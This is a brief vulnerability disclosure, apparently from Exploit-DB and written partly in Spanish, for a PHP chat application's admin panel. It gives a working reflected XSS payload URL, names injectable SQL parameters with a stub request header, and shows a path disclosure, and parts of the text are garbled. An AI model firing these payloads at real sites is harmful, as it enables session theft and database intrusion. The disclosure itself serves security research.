Cross Site Scripting:
Archivos Afectados Afectados
qchat.php
qc_admin/index.php?p=history
PoC:
localhost/qchat.php
Vector: “”>>
Input:
Is Reflected: localhost/qc_admin/index.php?p=history
PoC #2:
localhost/qc_admin/index.php?p=history&page=2+(XSS Vector)
Example:
localhost/qc_admin/index.php?p=history&page=2%22%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSS/%29;%3E%3E
——————————————————————-
SQL Injection
localhost/qc_admin/index.php?p=history&id=(SQL Injection)
localhost/qc_admin/index.php?p=history&page=(SQL Injection)
# Exploit-DB note: Here’s a PoC:
#
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET
CLR 2.0.50727)
Cookie: PHPSESSID=7d87f318548027737ae3893189e2ff0e
(Remplazar por una Session Cookie Valida)
——————————————————————-
Path Diclosure
localhost/qc_admin/index.php?p=history&id=’
in /var/www/chat/qc_admin/index.php on line 249
——————————————————————–
*By Dylan Irzi
@Dylan_Irzi11
Pentest de Seguridad.
*
评论关闭。